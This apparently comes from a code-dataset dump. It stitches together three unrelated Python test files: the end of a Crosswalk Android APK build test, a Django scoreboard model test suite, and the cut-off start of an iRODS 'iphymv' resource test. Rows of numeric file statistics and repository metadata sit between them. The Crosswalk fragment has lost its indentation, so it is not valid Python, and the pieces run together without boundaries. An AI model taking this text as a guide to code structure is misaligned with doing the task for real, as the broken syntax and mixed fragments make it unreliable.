x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 1)
self.assertEquals(arm_64Length, 0)
self.assertEquals(x86Length, 0)
self.assertEquals(armLength, 0)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_build_arm64_x8664(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86_64"
os.system(cmd)
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + 'crosswalk-app build --android-targets="arm64-v8a x86_64" ./'
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 1)
self.assertEquals(arm_64Length, 1)
self.assertEquals(x86Length, 0)
self.assertEquals(armLength, 0)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_build_noABIs(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86"
os.system(cmd)
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + 'crosswalk-app build --android-targets="arm64-v8a x86_64" ./'
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 0)
self.assertEquals(arm_64Length, 0)
self.assertEquals(x86Length, 0)
self.assertEquals(armLength, 0)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
if __name__ == '__main__':
unittest.main()
| 44.356401
| 132
| 0.551954
| 2,937
| 25,638
| 4.736466
| 0.068437
| 0.03738
| 0.032708
| 0.042053
| 0.916253
| 0.912803
| 0.911006
| 0.909352
| 0.909352
| 0.909352
| 0
| 0.049566
| 0.33505
| 25,638
| 577
| 133
| 44.433276
| 0.766424
| 0.058039
| 0
| 0.939623
| 0
| 0
| 0.131752
| 0.043904
| 0
| 0
| 0
| 0
| 0.177358
| 1
| 0.026415
| false
| 0
| 0.007547
| 0
| 0.035849
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96ec8a5a907cb52660917856c08f9e81bb3c0ebc
| 28,082
|
py
|
Python
|
board/test_models.py
|
amalolan/scoreboard
|
5fe6bdc19a069c9a13f2a48f5cbfbb62cbfc9fd2
|
[
"MIT"
] | null | null | null |
board/test_models.py
|
amalolan/scoreboard
|
5fe6bdc19a069c9a13f2a48f5cbfbb62cbfc9fd2
|
[
"MIT"
] | null | null | null |
board/test_models.py
|
amalolan/scoreboard
|
5fe6bdc19a069c9a13f2a48f5cbfbb62cbfc9fd2
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from .models import *
from copy import deepcopy
# TODO: Test with total_rounds > 9 and total_teams > 9
class ScoreboardTestCase(TestCase):
def setUp(self):
scoreboard = Scoreboard.objects.create(
num_teams=5, teams=['Coimbatore', 'Cuddalore',
'Bangalore', 'OMR', 'Gerukambakkam'],
num_rounds=4)
scoreboard.new_board()
scoreboard.save()
self.pk = scoreboard.pk
scoreboard.sent()
def get_scoreboard(self):
return Scoreboard.objects.get(pk=self.pk)
def test_set_theme(self):
scoreboard = self.get_scoreboard()
scoreboard.set_theme('default')
self.assertEqual(scoreboard.theme, 'default')
scoreboard.set_theme('light-blue')
self.assertEqual(scoreboard.theme, 'light-blue')
scoreboard.set_theme('big-bold')
self.assertEqual(scoreboard.theme, 'light-blue big-bold')
scoreboard.set_theme('light-brown')
self.assertEqual(scoreboard.theme, 'light-brown big-bold')
scoreboard.set_theme('big-bold')
self.assertEqual(scoreboard.theme, 'light-brown')
scoreboard.set_theme('big-bold')
self.assertEqual(scoreboard.theme, 'light-brown big-bold')
scoreboard.set_theme('default')
self.assertEqual(scoreboard.theme, 'default big-bold')
scoreboard.save()
self.assertTrue(scoreboard.is_changed())
def test_fix_overflow(self):
scoreboard = self.get_scoreboard()
scoreboard.fix_overflow('team3')
self.assertEqual(scoreboard.action_set.all().count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell="team1").count(), 0)
self.assertEqual(scoreboard.action_set.filter(cell="team3").count(), 1)
scoreboard.fix_overflow('team1')
self.assertEqual(scoreboard.action_set.all().count(), 2)
self.assertEqual(scoreboard.action_set.filter(cell="team1").count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell="team3").count(), 1)
scoreboard.fix_overflow('team3')
self.assertEqual(scoreboard.action_set.all().count(), 2)
self.assertEqual(scoreboard.action_set.filter(cell="team1").count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell="team3").count(), 1)
def test_add_question(self):
scoreboard = self.get_scoreboard()
board = deepcopy(scoreboard.board)
round_num = 2
question = ['Question 1', 1, 2, 3, 4, 5]
board[round_num].append(question)
scoreboard.add_question(round_num, question[1:])
self.assertEqual(board, scoreboard.board)
board = deepcopy(scoreboard.board)
round_num = 2
question = ['Question 2', 1, 2, 3, 4, 5]
board[round_num].append(question)
scoreboard.add_question(round_num, [str(i) for i in question[1:]])
self.assertEqual(board, scoreboard.board)
round_num = 183
with self.assertRaises(AssertionError):
scoreboard.add_question(round_num, question)
round_num = 0
question = [1, 2, 3, 4, 5, 6, 7, 8]
with self.assertRaises(AssertionError):
scoreboard.add_question(round_num, question)
round_num = 3
question = [1, 2]
with self.assertRaises(AssertionError):
scoreboard.add_question(round_num, question)
question = []
with self.assertRaises(AssertionError):
scoreboard.add_question(round_num, question)
def test_get_sum(self):
scoreboard = self.get_scoreboard()
board = deepcopy(scoreboard.board)
round_num = 2
question = ['Question 1', 1, 10, 0, 1, 0]
board[round_num].append(question)
board[round_num][0][1:] = question[1:]
scoreboard.add_question(round_num, question[1:])
self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0])
board = deepcopy(scoreboard.board)
question = ['Question 2', 0, 1, 2, 0, 1]
board[round_num].append(question)
board[round_num][0][1:] = [1, 11, 2, 1, 1]
scoreboard.add_question(round_num, question[1:])
self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0])
board = deepcopy(scoreboard.board)
round_num = 3
question = ['Question 1', 0, 1, 2, 0, 1]
board[round_num].append(question)
board[round_num][0][1:] = question[1:]
scoreboard.add_question(round_num, question[1:])
self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0])
board = deepcopy(scoreboard.board)
round_num = 0
board[round_num][0][1:] = [1, 12, 4, 1, 2]
self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0])
board = deepcopy(scoreboard.board)
round_num = -1
with self.assertRaises(AssertionError):
self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0])
board = deepcopy(scoreboard.board)
round_num = 3114
with self.assertRaises(AssertionError):
self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0])
with self.assertRaises(AssertionError):
self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0])
def test_get_winner(self):
scoreboard = self.get_scoreboard()
scoreboard.add_question(1, [1, 2, 3, 4, 5])
self.assertEqual(scoreboard.get_winner(), 'team5')
scoreboard = self.get_scoreboard()
scoreboard.add_question(2, [1, 2, 3, 4, 1])
self.assertEqual(scoreboard.get_winner(), 'team4')
scoreboard.new_board()
scoreboard = self.get_scoreboard()
scoreboard.add_question(1, [1, 2, 5, 4, 5])
with self.assertRaises(AssertionError):
scoreboard.get_winner()
scoreboard.new_board()
scoreboard = self.get_scoreboard()
with self.assertRaises(AssertionError):
scoreboard.get_winner()
def test_gain_loss_animation(self):
team = 'team3'
points = 15
scoreboard = self.get_scoreboard()
scoreboard.gain_loss_animation(team, points)
self.assertEqual(scoreboard.action_set.all().count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell=team).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___points=points).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='gain').count(), 1)
team = 'team3'
points = -15
scoreboard = self.get_scoreboard()
scoreboard.gain_loss_animation(team, points)
self.assertEqual(scoreboard.action_set.all().count(), 2)
self.assertEqual(scoreboard.action_set.filter(cell=team).count(), 2)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___points=points).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='loss').count(), 1)
team = 'team1'
points = 29
scoreboard = self.get_scoreboard()
scoreboard.gain_loss_animation(team, points)
self.assertEqual(scoreboard.action_set.all().count(), 3)
self.assertEqual(scoreboard.action_set.filter(cell=team).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___points=points).count(), 1)
scoreboard.fix_overflow('team3')
self.assertEqual(scoreboard.action_set.all().count(), 4)
self.assertEqual(scoreboard.action_set.filter(cell=team).count(), 1)
team = 'team3'
points = 0
scoreboard = self.get_scoreboard()
with self.assertRaises(AssertionError):
scoreboard.gain_loss_animation(team, points)
def test_change_points(self):
coords = [[1, 0, 1], [3, 0, 2], [2, 0, 2], [4, 0, 3]]
points = [10, 15, 15, -15]
scoreboard = self.get_scoreboard()
board = deepcopy(scoreboard.board)
board[1][0][1] = 10
board[3][0][2] = 15
board[2][0][2] = 15
board[4][0][3] = -15
board[0][0][1] = 10
board[0][0][2] = 30
board[0][0][3] = -15
scoreboard.change_points(coords, points)
self.assertEqual(scoreboard.board, board)
coords = [[1, 0, 1]]
points = [10]
scoreboard = self.get_scoreboard()
board = deepcopy(scoreboard.board)
board[1][0][1] = 10
board[0][0][1] = 10
scoreboard.change_points(coords, points)
self.assertEqual(scoreboard.board, board)
coords = [[1, 0, 1]]
points = [0]
scoreboard.change_points(coords, points)
self.assertEqual(scoreboard.board, board)
def test_points_change(self):
cell = '1,0,3'
coords = [int(i) for i in cell.split(',')]
points = 15
pc_animation = False
gl_animation = False
scoreboard = self.get_scoreboard()
board = deepcopy(scoreboard.board)
board[coords[0]][0][coords[2]] += points
board[0][0][coords[2]] += points
scoreboard.points_change(cell, points, pc_animation, gl_animation)
self.assertEqual(scoreboard.action_set.count(), 0)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___points=points).count(), 0)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='gain').count(), 0)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='null').count(), 0)
cell = '2,0,2'
coords = [int(i) for i in cell.split(',')]
points = -15
pc_animation = True
gl_animation = False
scoreboard = self.get_scoreboard()
board = deepcopy(scoreboard.board)
board[coords[0]][0][coords[2]] += points
board[0][0][coords[2]] += points
scoreboard.points_change(cell, points, pc_animation, gl_animation)
self.assertEqual(scoreboard.action_set.count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___points=points).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='gain').count(), 0)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='null').count(), 0)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='loss').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___gl_animation=False).count(), 1)
# If pc_animation and gl_animation are true, check if GLAction object is
# created and if PCAction object has animate_type set to gain/loss.
cell = '3,0,5'
coords = [int(i) for i in cell.split(',')]
points = 1
pc_animation = True
gl_animation = True
scoreboard = self.get_scoreboard()
board = deepcopy(scoreboard.board)
board[coords[0]][0][coords[2]] += points
board[0][0][coords[2]] += points
scoreboard.points_change(cell, points, pc_animation, gl_animation)
self.assertEqual(scoreboard.action_set.count(), 3)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___points=points).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='gain').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='null').count(), 0)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='loss').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___gl_animation=False).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___gl_animation=True).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='loss').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='gain').count(), 2)
self.assertEqual(scoreboard.action_set.filter(cell='team5').count(), 1)
# If pc_animation is False, but gl_animation is true, check if GLAction
# object is still created.
cell = '4,0,5'
coords = [int(i) for i in cell.split(',')]
points = 1
pc_animation = False
gl_animation = True
scoreboard = self.get_scoreboard()
board = deepcopy(scoreboard.board)
board[coords[0]][0][coords[2]] += points
board[0][0][coords[2]] += points
scoreboard.points_change(cell, points, pc_animation, gl_animation)
self.assertEqual(scoreboard.action_set.count(), 4)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___points=points).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='gain').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='null').count(), 0)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='loss').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___gl_animation=False).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___gl_animation=True).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='loss').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='gain').count(), 3)
cell = '4,0,5'
coords = [int(i) for i in cell.split(',')]
points = -20
pc_animation = False
gl_animation = True
scoreboard = self.get_scoreboard()
board = deepcopy(scoreboard.board)
board[coords[0]][0][coords[2]] += points
board[0][0][coords[2]] += points
scoreboard.points_change(cell, points, pc_animation, gl_animation)
scoreboard.save()
scoreboard.fix_overflow('team5')
self.assertEqual(scoreboard.action_set.count(), 6)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___points=points).count(), 0)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='gain').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='null').count(), 0)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='loss').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___gl_animation=False).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___gl_animation=True).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='loss').count(), 2)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='gain').count(), 3)
def test_question(self):
rn = 2
scores = [1, 2, 1, 1, 1]
pc = False
gl = False
scoreboard = self.get_scoreboard()
rs = str(rn) + ",0"
scoreboard.question(rn, scores, pc, gl)
self.assertEqual(scoreboard.action_set.count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell=rs).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
QuestionAction___animation_type='null').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
QuestionAction___scores=scores).count(), 1)
scoreboard.save()
rn = 2
scores = [1, 2, 0, 0, 1]
pc = True
gl = False
scoreboard = self.get_scoreboard()
rs = str(rn) + ",0"
scoreboard.question(rn, scores, pc, gl)
self.assertEqual(scoreboard.action_set.count(), 8)
self.assertEqual(scoreboard.action_set.filter(cell=rs).count(), 2)
self.assertEqual(scoreboard.action_set.filter(
QuestionAction___animation_type='null').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='gain').count(), 7)
self.assertEqual(scoreboard.action_set.filter(cell='2,0,5').count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell='2,0,1').count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell='2,0,2').count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell='0,0,5').count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell='0,0,1').count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell='0,0,2').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
name='points_change').count(), 6)
scoreboard.save()
rn = 4
scores = [1, -39, 0, -2, 15]
pc = True
gl = True
scoreboard = self.get_scoreboard()
rs = str(rn) + ",0"
scoreboard.question(rn, scores, pc, gl)
self.assertEqual(scoreboard.action_set.count(), 21)
self.assertEqual(scoreboard.action_set.filter(cell=rs).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
QuestionAction___animation_type='null').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
QuestionAction___animation_type='gain').count(), 2)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='gain').count(), 12)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='loss').count(), 4)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='loss').count(), 6)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='gain').count(), 14)
self.assertEqual(scoreboard.action_set.filter(
cell="team1").count(), 1)
self.assertEqual(scoreboard.action_set.filter(
cell="team5").count(), 1)
self.assertEqual(scoreboard.action_set.filter(
cell="team2").count(), 1)
self.assertEqual(scoreboard.action_set.filter(
cell="team4").count(), 1)
scoreboard.save()
rn = 1
scores = [-1000, 0, 0, 0, 15]
pc = False
gl = True
scoreboard = self.get_scoreboard()
rs = str(rn) + ",0"
scoreboard.question(rn, scores, pc, gl)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___points=0).count(), 0)
self.assertEqual(scoreboard.action_set.count(), 24)
self.assertEqual(scoreboard.action_set.filter(cell=rs).count(), 1)
self.assertEqual(scoreboard.action_set.filter(
QuestionAction___animation_type='null').count(), 2)
self.assertEqual(scoreboard.action_set.filter(
QuestionAction___animation_type='gain').count(), 2)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='gain').count(), 12)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='loss').count(), 4)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='loss').count(), 7)
self.assertEqual(scoreboard.action_set.filter(
GainLossAction___animation_type='gain').count(), 15)
self.assertEqual(scoreboard.action_set.filter(
cell="team1").count(), 2)
self.assertEqual(scoreboard.action_set.filter(
cell="team5").count(), 2)
self.assertEqual(scoreboard.action_set.filter(
cell="team2").count(), 1)
self.assertEqual(scoreboard.action_set.filter(
cell="team4").count(), 1)
scoreboard.save()
self.setUp()
rn = 2
scores = [1, 2, 3, 4, 5]
pc = True
gl = False
scoreboard = self.get_scoreboard()
rs = str(rn) + ",0"
scoreboard.question(rn, scores, pc, gl)
self.assertEqual(scoreboard.action_set.count(), 11)
self.assertEqual(scoreboard.action_set.filter(
QuestionAction___animation_type='null').count(), 0)
self.assertEqual(scoreboard.action_set.filter(
PointsChangeAction___animation_type='gain').count(), 11)
self.assertEqual(scoreboard.action_set.filter(cell='2,0,5').count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell='2,0,1').count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell='2,0,2').count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell='0,0,5').count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell='0,0,1').count(), 1)
self.assertEqual(scoreboard.action_set.filter(cell='0,0,2').count(), 1)
self.assertEqual(scoreboard.action_set.filter(
name='points_change').count(), 10)
def test_save_points_changes(self):
scoreboard = self.get_scoreboard()
cell = '1,0,3'
coords = [int(i) for i in cell.split(',')]
points = 15
pc_animation = False
gl_animation = False
scoreboard.points_change(cell, points, pc_animation, gl_animation)
self.assertEqual(len(scoreboard.history), 1)
self.assertEqual(scoreboard.history[-1].get('points'), points)
scoreboard.save_points_changes()
self.assertEqual(len(scoreboard.history), 1)
self.assertIsNone(scoreboard.history[-1].get('points'))
self.assertEqual(scoreboard.history[-1].get('scores'), [0, 0, 15, 0, 0])
self.assertEqual(scoreboard.history[-1].get('round_num'), coords[0])
self.assertEqual(scoreboard.history[-1].get('question_num'), 1)
scoreboard.save()
scoreboard = self.get_scoreboard()
cell = '1,0,2'
coords = [int(i) for i in cell.split(',')]
points = -30
pc_animation = True
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
cell = '1,0,5'
coords = [int(i) for i in cell.split(',')]
points = 1
pc_animation = False
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
self.assertEqual(len(scoreboard.history), 3)
self.assertEqual(scoreboard.history[-1].get('points'), points)
self.assertEqual(scoreboard.history[-2].get('points'), -30)
scoreboard.save_points_changes()
self.assertEqual(len(scoreboard.history), 2)
self.assertIsNone(scoreboard.history[-1].get('points'))
self.assertEqual(scoreboard.history[-1].get('scores'), [0, -30, 0, 0, 1])
self.assertEqual(scoreboard.history[-1].get('round_num'), coords[0])
self.assertEqual(scoreboard.history[-1].get('question_num'), 2)
scoreboard.save()
scoreboard = self.get_scoreboard()
cell = '2,0,2'
coords = [int(i) for i in cell.split(',')]
points = -30
pc_animation = True
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
cell = '2,0,5'
coords = [int(i) for i in cell.split(',')]
points = 1
pc_animation = False
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
cell = '2,0,1'
coords = [int(i) for i in cell.split(',')]
points = 12
pc_animation = False
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
self.assertEqual(len(scoreboard.history), 5)
self.assertEqual(scoreboard.history[-1].get('points'), points)
self.assertEqual(scoreboard.history[-2].get('points'), 1)
scoreboard.save_points_changes()
self.assertEqual(len(scoreboard.history), 3)
self.assertIsNone(scoreboard.history[-1].get('points'))
self.assertEqual(scoreboard.history[-1].get('scores'), [12, -30, 0, 0, 1])
self.assertEqual(scoreboard.history[-1].get('round_num'), coords[0])
self.assertEqual(scoreboard.history[-1].get('question_num'), 1)
scoreboard.save()
scoreboard = self.get_scoreboard()
cell = '3,0,2'
coords = [int(i) for i in cell.split(',')]
points = -30
pc_animation = True
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
cell = '2,0,5'
coords = [int(i) for i in cell.split(',')]
points = 1
pc_animation = False
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
cell = '2,0,1'
coords = [int(i) for i in cell.split(',')]
points = 12
pc_animation = False
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
self.assertEqual(len(scoreboard.history), 6)
self.assertEqual(scoreboard.history[-1].get('points'), points)
self.assertEqual(scoreboard.history[-2].get('points'), 1)
scoreboard.save_points_changes()
self.assertEqual(len(scoreboard.history), 5)
self.assertIsNone(scoreboard.history[-1].get('points'))
self.assertEqual(scoreboard.history[-1].get('scores'), [12, 0, 0, 0, 1])
self.assertEqual(scoreboard.history[-1].get('round_num'), coords[0])
self.assertEqual(scoreboard.history[-1].get('question_num'), 2)
self.assertEqual(scoreboard.history[-2].get('points'), -30)
self.assertEqual(scoreboard.history[-2].get('round_num'), 3)
scoreboard.save()
scoreboard = self.get_scoreboard()
cell = '3,0,2'
coords = [int(i) for i in cell.split(',')]
points = -30
pc_animation = True
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
cell = '3,0,5'
coords = [int(i) for i in cell.split(',')]
points = 1
pc_animation = False
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
cell = '3,0,1'
coords = [int(i) for i in cell.split(',')]
points = 12
pc_animation = False
gl_animation = True
scoreboard.points_change(cell, points, pc_animation, gl_animation)
self.assertEqual(len(scoreboard.history), 8)
self.assertEqual(scoreboard.history[-1].get('points'), points)
self.assertEqual(scoreboard.history[-2].get('points'), 1)
scoreboard.save_points_changes()
self.assertEqual(len(scoreboard.history), 6)
self.assertIsNone(scoreboard.history[-1].get('points'))
self.assertEqual(scoreboard.history[-1].get('scores'), [12, -30, 0, 0, 1])
self.assertEqual(scoreboard.history[-1].get('round_num'), coords[0])
self.assertEqual(scoreboard.history[-1].get('question_num'), 1)
self.assertEqual(scoreboard.history[-3].get('points'), -30)
self.assertEqual(scoreboard.history[-3].get('round_num'), 3)
scoreboard.save()
| 44.015674
| 82
| 0.625988
| 3,222
| 28,082
| 5.274364
| 0.041279
| 0.14917
| 0.230964
| 0.200659
| 0.933624
| 0.920737
| 0.900847
| 0.876721
| 0.868601
| 0.835236
| 0
| 0.029243
| 0.243786
| 28,082
| 638
| 83
| 44.015674
| 0.771002
| 0.010113
| 0
| 0.792553
| 0
| 0
| 0.035585
| 0
| 0
| 0
| 0
| 0.001567
| 0.328014
| 1
| 0.021277
| false
| 0
| 0.005319
| 0.001773
| 0.030142
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8c047e6dea2646398154f76b598a81a7a4503096
| 4,978
|
py
|
Python
|
tests/pydevtest/test_iphymv.py
|
iychoi/cyverse-irods
|
0070b8677a82e763f1d940ae6537b1c8839a628a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/pydevtest/test_iphymv.py
|
iychoi/cyverse-irods
|
0070b8677a82e763f1d940ae6537b1c8839a628a
|
[
"BSD-3-Clause"
] | 7
|
2019-12-02T17:55:49.000Z
|
2019-12-02T17:55:59.000Z
|
tests/pydevtest/test_iphymv.py
|
benlazarine/cyverse-irods
|
2bf9cfae4c3a1062ffe2af92b1f086ddc5fce025
|
[
"BSD-3-Clause"
] | 1
|
2019-12-02T05:40:13.000Z
|
2019-12-02T05:40:13.000Z
|
import os
import re
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import shutil
import configuration
from resource_suite import ResourceBase
import lib
import copy
class Test_iPhymv(ResourceBase, unittest.TestCase):
def setUp(self):
super(Test_iPhymv, self).setUp()
self.testing_tmp_dir = '/tmp/irods-test-iphymv'
shutil.rmtree(self.testing_tmp_dir, ignore_errors=True)
os.mkdir(self.testing_tmp_dir)
def tearDown(self):
shutil.rmtree(self.testing_tmp_dir)
super(Test_iPhymv, self).tearDown()
def test_iphymv_invalid_resource__2821(self):
filepath = os.path.join(self.admin.local_session_dir, 'file')
lib.make_file(filepath, 1)
dest_path = self.admin.session_collection + '/file'
self.admin.assert_icommand('iput ' + filepath)
self.admin.assert_icommand('iphymv -S invalidResc -R demoResc '+dest_path, 'STDERR_SINGLELINE', 'SYS_RESC_DOES_NOT_EXIST')
self.admin.assert_icommand('iphymv -S demoResc -R invalidResc '+dest_path, 'STDERR_SINGLELINE', 'SYS_RESC_DOES_NOT_EXIST')
def test_iphymv_unable_to_unlink__2820(self):
filepath = os.path.join(self.admin.local_session_dir, 'file')
lib.make_file(filepath, 1)
dest_path = self.admin.session_collection + '/file'
self.admin.assert_icommand('ireg '+filepath+' '+dest_path)
os.chmod(filepath, 0444)
self.admin.assert_icommand('iphymv -S demoResc -R pydevtest_TestResc '+dest_path, 'STDERR_SINGLELINE', 'SYS_USER_NO_PERMISSION')
os.chmod(filepath, 0666)
self.admin.assert_icommand('iphymv -S demoResc -R pydevtest_TestResc '+dest_path)
def test_iphymv_to_child_resource__2933(self):
self.admin.assert_icommand("iadmin mkresc rrResc roundrobin", 'STDOUT_SINGLELINE', 'roundrobin')
self.admin.assert_icommand("iadmin mkresc unix1Resc 'unixfilesystem' " + configuration.HOSTNAME_1 + ":" +
lib.get_irods_top_level_dir() + "/unix1RescVault", 'STDOUT_SINGLELINE', 'unixfilesystem')
self.admin.assert_icommand("iadmin mkresc unix2Resc 'unixfilesystem' " + configuration.HOSTNAME_2 + ":" +
lib.get_irods_top_level_dir() + "/unix2RescVault", 'STDOUT_SINGLELINE', 'unixfilesystem')
self.admin.assert_icommand("iadmin addchildtoresc rrResc unix1Resc")
self.admin.assert_icommand("iadmin addchildtoresc rrResc unix2Resc")
filepath = os.path.join(self.admin.local_session_dir, 'file')
lib.make_file(filepath, 1)
dest_path = self.admin.session_collection + '/file'
